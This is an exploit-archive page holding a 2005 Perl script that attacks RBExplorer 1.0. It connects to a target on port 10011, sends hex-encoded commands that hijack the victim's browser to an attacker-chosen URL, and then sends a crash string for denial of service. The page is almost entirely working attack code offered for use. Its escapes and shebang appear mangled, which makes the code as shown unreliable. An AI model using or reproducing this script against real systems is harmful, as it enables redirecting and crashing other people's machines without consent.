[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : RBExplorer 1.0 (Hijacking Command) Denial of Service Exploit
# Published : 2005-10-11
# Author : basher13
# Previous Title : TYPSoft FTP Server <= 1.11 (RETR) Denial of Service Vulnerability
# Next Title : Virtools Web Player <= 3.0.0.100 Buffer Overflow DoS Exploit
#!usr/bin/perl
#
# RBExplorer Hijack Command Exploit
# ----------------------------------------------
# Infam0us Gr0up - Securiti Research
#
# Info: infamous.2hell.com
# Vendor URL: http://www.kabrian.com /arbie@kabrian.com
#
use IO::Socket;
if (@ARGV != 3)
{
print "n RBExplorer Hijack Command Exploitn";
print "-----------------------------------------nn";
print "[!] usage: perl $0 [target] [localIP] [LocalURL]n";
print "[?] exam: perl $0 192.332.34.4 213.234.12.1 http://hijack.spyp0rn.comn";
print "n";
exit ();
}
$adr = $ARGV[0];
$lip = $ARGV[1];
$lurl = $ARGV[2];
$crash =
"x23x44x6fx77x6ex6cx6fx61x64".
"x57x48x4fx41x52x45x59x4fx55x49".
"x53x4ex4fx54x49x4dx50x4fx52x54".
"x41x4ex54x42x55x54x54x48x45x52".
"x45x4fx4ex45x57x41x59x54x4fx46".
"x49x4cx4cx46x52x45x45x49x42x45".
"x4cx49x56x45";
print "n[+] Connect to $adr..n";
$remote = IO::Socket::INET->new(Proto=>"x74x63x70", PeerAddr=>$adr,
PeerPort=>10011, Reuse=>1) or die "Error: can't connect to $adr:10011n";
$chr1 = "x24x49x50x3a";
$chr2 = "x23x4ex61x76x69x67x61x74x65x54x6f";
print "[+] Connectedn";
$remote->autoflush(1);
print $remote "n";
sleep(1);
print $remote "$chr1 $lipn" and print "[+] Hijacking $adr...n" or die
"[-] Error: $lip not listenn";
sleep(2);
print "[+] $lip listening!n";
print $remote "$chr2 $lurln" and print "[+] Hijacking browser...n" or die
"[-] Error: hijacking failedn";
sleep(2);
print "[+] Browser hijacked!n";
print "[+] Sleep 15 seconds..n";
sleep(15);
print "[+] Send crash byte..n";
print $remote "$crash";
sleep(2);
print "[+] DONEnn";
print "..press any key to exitn";
$bla= ;
close $remote;
# www.Syue.com [2005-10-11]